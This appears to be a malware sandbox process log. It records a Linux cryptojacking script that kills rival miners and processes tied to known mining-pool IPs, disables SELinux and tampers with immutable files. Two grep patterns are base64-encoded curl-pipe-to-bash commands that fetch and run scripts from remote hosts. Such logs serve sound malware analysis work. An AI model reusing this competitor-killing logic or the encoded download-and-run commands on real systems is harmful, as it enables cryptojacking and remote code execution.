  PID:997
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:999
- /bin/grep
  grep -v grep
  2⤵
  PID:996
- /bin/ps
  ps aux
  2⤵
  PID:995
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1004
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1003
- /bin/grep
  grep -v grep
  2⤵
  PID:1002
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1005
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1001
- /bin/grep
  grep -v grep
  2⤵
  PID:1008
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1010
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1009
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1007
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1011
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1015
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1014
- /bin/grep
  grep -v grep
  2⤵
  PID:1013
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1016
- /bin/ps
  ps aux
  2⤵
  PID:1012
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1020
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1019
- /bin/grep
  grep -v grep
  2⤵
  PID:1018
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1021
- /bin/ps
  ps aux
  2⤵
  PID:1017
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1025
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1024
- /bin/grep
  grep -v grep
  2⤵
  PID:1023
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1026
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1022
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1030
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1031
- /bin/grep
  grep -v grep
  2⤵
  PID:1028
- /bin/ps
  ps aux
  2⤵
  PID:1027
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1034
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1036
- /bin/grep
  grep -v grep
  2⤵
  PID:1033
- /bin/ps
  ps aux
  2⤵
  PID:1032
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1040
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1041
- /bin/grep
  grep -v grep
  2⤵
  PID:1038
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1037
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1045
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1046
- /bin/grep
  grep -v grep
  2⤵
  PID:1043
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1042
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1050
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1051
- /bin/grep
  grep -v grep
  2⤵
  PID:1048
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1047
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1055
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1054
- /bin/grep
  grep -v grep
  2⤵
  PID:1053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1056
- /bin/ps
  ps aux
  2⤵
  PID:1052
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1059
- /bin/grep
  grep -v grep
  2⤵
  PID:1058
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1060
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1061
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1057
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1064
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1065
- /bin/grep
  grep -v grep
  2⤵
  PID:1063
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1062
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1066
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1070
- /bin/grep
  grep svc
  2⤵
  PID:1069
- /bin/grep
  grep -v grep
  2⤵
  PID:1068
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1071
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1067
- /bin/ps
  ps aux
  2⤵
  PID:1072
- /bin/grep
  grep -v grep
  2⤵
  PID:1073
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1074
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1075
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1076
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1083
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1082
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1084
- /bin/grep
  grep -v grep
  2⤵
  PID:1081
- /bin/ps
  ps aux
  2⤵
  PID:1080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1088
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1089
- /bin/grep
  grep -v grep
  2⤵
  PID:1086
- /bin/ps
  ps aux
  2⤵
  PID:1085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1093
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1092
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1094
- /bin/grep
  grep -v grep
  2⤵
  PID:1091
- /bin/ps
  ps aux
  2⤵
  PID:1090
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1097
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1098
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1099
- /bin/grep
  grep -v grep
  2⤵
  PID:1096
- /bin/ps
  ps aux
  2⤵
  PID:1095
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1103
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1102
- /bin/grep
  grep -v grep
  2⤵
  PID:1101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1104
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1108
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:1107
- /bin/grep
  grep -v grep
  2⤵
  PID:1106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1109
- /bin/ps
  ps aux
  2⤵
  PID:1105
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1113
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1112
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1114
- /bin/grep
  grep -v grep
  2⤵
  PID:1111
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1110
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1118
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1117
- /bin/grep
  grep -v grep
  2⤵
  PID:1116
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1119
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1115
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1123
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1122
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1124
- /bin/grep
  grep -v grep
  2⤵
  PID:1121
- /bin/ps
  ps aux
  2⤵
  PID:1120
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1128
- /bin/grep
  grep -v grep
  2⤵
  PID:1126
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1127
- /bin/ps
  ps aux
  2⤵
  PID:1125
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1129
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1135
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1134
- /bin/grep
  grep -v grep
  2⤵
  PID:1133
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1136
- /bin/ps
  ps aux
  2⤵
  PID:1132
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1142
- /bin/grep
  grep -v grep
  2⤵
  PID:1140
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1141
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1139
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1147
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1146
- /bin/grep
  grep -v grep
  2⤵
  PID:1145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1149
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1144
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1152
- /bin/grep
  grep -v grep
  2⤵
  PID:1151
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1153
- /bin/ps
  ps aux
  2⤵
  PID:1150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1160
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1159
- /bin/grep
  grep -v grep
  2⤵
  PID:1158
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1161
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1157
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1167
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1166
- /bin/grep
  grep -v grep
  2⤵
  PID:1165
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1168
- /bin/ps
  ps aux
  2⤵
  PID:1164
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1174
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1173
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1175
- /bin/grep
  grep -v grep
  2⤵
  PID:1172
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1171
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1179
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1180
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1181
- /bin/grep
  grep -v grep
  2⤵
  PID:1178
- /bin/ps
  ps aux
  2⤵
  PID:1177
- /bin/grep
  grep -v aux
  2⤵
  PID:1185
- /bin/grep
  grep "]"
  2⤵
  PID:1186
- /bin/grep
  grep -v grep
  2⤵
  PID:1184
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1187
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1183
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1188
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1195
- /bin/grep
  grep -v grep
  2⤵
  PID:1192
- /bin/ps
  ps aux
  2⤵
  PID:1191
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1201
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1200
- /bin/grep
  grep -v grep
  2⤵
  PID:1199
- /bin/ps
  ps aux
  2⤵
  PID:1198
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1202
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1208
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1207
- /bin/grep
  grep -v grep
  2⤵
  PID:1206
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1209
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1205
- /bin/grep
  grep -v -
  2⤵
  PID:1213
- /bin/grep
  grep -v /
  2⤵
  PID:1212
- /bin/grep
  grep -v grep
  2⤵
  PID:1211
- /bin/grep
  grep -v _
  2⤵
  PID:1214
- /bin/ps
  ps aux
  2⤵
  PID:1210
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1215
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1216
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1222
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1221
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1223
- /bin/grep
  grep -v grep
  2⤵
  PID:1220
- /bin/ps
  ps aux
  2⤵
  PID:1219
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1229
- /bin/grep
  grep rsync
  2⤵
  PID:1228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1230
- /bin/grep
  grep -v grep
  2⤵
  PID:1227
- /bin/ps
  ps aux
  2⤵
  PID:1226
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1236
- /bin/grep
  grep watchd0g
  2⤵
  PID:1235
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1237
- /bin/grep
  grep -v grep
  2⤵
  PID:1234
- /bin/ps
  ps aux
  2⤵
  PID:1233
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1242
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1243
- /bin/grep
  grep -v grep
  2⤵
  PID:1240
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1239
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1241
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1248
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:1247
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1249
- /bin/grep
  grep -v grep
  2⤵
  PID:1246
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1245
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1256
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1254
- /bin/grep
  grep -v grep
  2⤵
  PID:1253
- /bin/ps
  ps aux
  2⤵
  PID:1252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1260
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1261
- /bin/grep
  grep gitee.com
  2⤵
  PID:1259
- /bin/grep
  grep -v grep
  2⤵
  PID:1258
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1257
- /bin/grep
  grep -v grep
  2⤵
  PID:1263
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1264
- /bin/ps
  ps aux
  2⤵
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1265
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1266
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1270
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1269
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1271
- /bin/grep
  grep -v grep
  2⤵
  PID:1268
- /bin/ps
  ps aux
  2⤵
  PID:1267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1275
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1276
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1274
- /bin/grep
  grep -v grep
  2⤵
  PID:1273
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1272
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1281
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1280
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1279
- /bin/grep
  grep -v grep
  2⤵
  PID:1278
- /bin/ps
  ps aux
  2⤵
  PID:1277
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1286
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1285
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1284
- /bin/grep
  grep -v grep
  2⤵
  PID:1283
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1282
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1291
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1289
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1290
- /bin/grep
  grep -v grep
  2⤵
  PID:1288
- /bin/ps
  ps aux
  2⤵
  PID:1287
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1296
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1295
- /bin/grep
  grep netdns
  2⤵
  PID:1294
- /bin/grep
  grep -v grep
  2⤵
  PID:1293
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1292
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1300
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1301
- /bin/grep
  grep watchdogs
  2⤵
  PID:1299
- /bin/grep
  grep -v grep
  2⤵
  PID:1298
- /bin/ps
  ps aux
  2⤵
  PID:1297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1305
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1306
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1304
- /bin/grep
  grep -v grep
  2⤵
  PID:1303
- /bin/ps
  ps aux
  2⤵
  PID:1302
- /bin/grep
  grep -v grep
  2⤵
  PID:1308
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1310
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1311
- /bin/grep
  grep kinsing
  2⤵
  PID:1309
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1307
- /bin/grep
  grep redis2
  2⤵
  PID:1314
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1315
- /bin/grep
  grep -v grep
  2⤵
  PID:1313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1316
- /bin/ps
  ps aux
  2⤵
  PID:1312
- /bin/grep
  grep -v aux
  2⤵
  PID:1319
- /bin/grep
  grep " ps"
  2⤵
  PID:1320
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1321
- /bin/grep
  grep -v grep
  2⤵
  PID:1318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1322
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1317
- /bin/grep
  grep sync_supers
  2⤵
  PID:1325
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1327
- /bin/grep
  grep -v grep
  2⤵
  PID:1324
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1323
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1326
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1331
- /bin/grep
  grep cpuset
  2⤵
  PID:1330
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1332
- /bin/grep
  grep -v grep
  2⤵
  PID:1329
- /bin/ps
  ps aux
  2⤵
  PID:1328
- /bin/grep
  grep "x]"
  2⤵
  PID:1336
- /bin/grep
  grep -v aux
  2⤵
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1337
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1338
- /bin/grep
  grep -v grep
  2⤵
  PID:1334
- /bin/ps
  ps aux
  2⤵
  PID:1333
- /bin/grep
  grep -v aux
  2⤵
  PID:1341
- /bin/grep
  grep -v grep
  2⤵
  PID:1340
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1339
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1342
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1344
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1348
- /bin/grep
  grep -v aux
  2⤵
  PID:1347
- /bin/grep
  grep -v grep
  2⤵
  PID:1346
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1349
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1350
- /bin/ps
  ps aux
  2⤵
  PID:1345
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1354
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1355
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1353
- /bin/grep
  grep -v grep
  2⤵
  PID:1352
- /bin/ps
  ps aux
  2⤵
  PID:1351
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1358
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1359
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1360
- /bin/grep
  grep -v grep
  2⤵
  PID:1357
- /bin/ps
  ps aux
  2⤵
  PID:1356
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1364
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1365
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1363
- /bin/grep
  grep -v grep
  2⤵
  PID:1362
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1361
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1369
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1368
- /bin/grep
  grep -v grep
  2⤵
  PID:1367
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1366
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1374
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1373
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1375
- /bin/grep
  grep -v grep
  2⤵
  PID:1372
- /bin/ps
  ps aux
  2⤵
  PID:1371
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1378
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1380
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1379
- /bin/grep
  grep -v grep
  2⤵
  PID:1377
- /bin/ps
  ps aux
  2⤵
  PID:1376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1384
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1383
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1385
- /bin/grep
  grep -v grep
  2⤵
  PID:1382
- /bin/ps
  ps aux
  2⤵
  PID:1381
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1389
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1388
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1390
- /bin/grep
  grep -v grep
  2⤵
  PID:1387
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1386
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1394
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1393
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1395
- /bin/grep
  grep -v grep
  2⤵
  PID:1392
- /bin/ps
  ps aux
  2⤵
  PID:1391
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1399
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1400
- /bin/grep
  grep sustse
  2⤵
  PID:1398
- /bin/grep
  grep -v grep
  2⤵
  PID:1397
- /bin/ps
  ps aux
  2⤵
  PID:1396
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1404
- /bin/grep
  grep sustse3
  2⤵
  PID:1403
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1405
- /bin/grep
  grep -v grep
  2⤵
  PID:1402
- /bin/ps
  ps aux
  2⤵
  PID:1401
- /bin/grep
  grep wget
  2⤵
  PID:1409
- /bin/grep
  grep mr.sh
  2⤵
  PID:1408
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1411
- /bin/grep
  grep -v grep
  2⤵
  PID:1407
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1410
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1406
- /bin/grep
  grep curl
  2⤵
  PID:1415
- /bin/grep
  grep mr.sh
  2⤵
  PID:1414
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1416
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1417
- /bin/grep
  grep -v grep
  2⤵
  PID:1413
- /bin/ps
  ps aux
  2⤵
  PID:1412
- /bin/grep
  grep wget
  2⤵
  PID:1421
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1420
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1422
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1423
- /bin/grep
  grep -v grep
  2⤵
  PID:1419
- /bin/ps
  ps aux
  2⤵
  PID:1418
- /bin/grep
  grep curl
  2⤵
  PID:1427
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1426
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep -v grep
  2⤵
  PID:1425
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1429
- /bin/ps
  ps aux
  2⤵
  PID:1424
- /bin/grep
  grep wget
  2⤵
  PID:1433
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1434
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1432
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1435
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1430
- /bin/grep
  grep curl
  2⤵
  PID:1439
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1438
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1440
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1441
- /bin/grep
  grep -v grep
  2⤵
  PID:1437
- /bin/ps
  ps aux
  2⤵
  PID:1436
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1444
- /bin/grep
  grep -v grep
  2⤵
  PID:1443
- /bin/grep
  grep wget
  2⤵
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1446
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1442
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1447
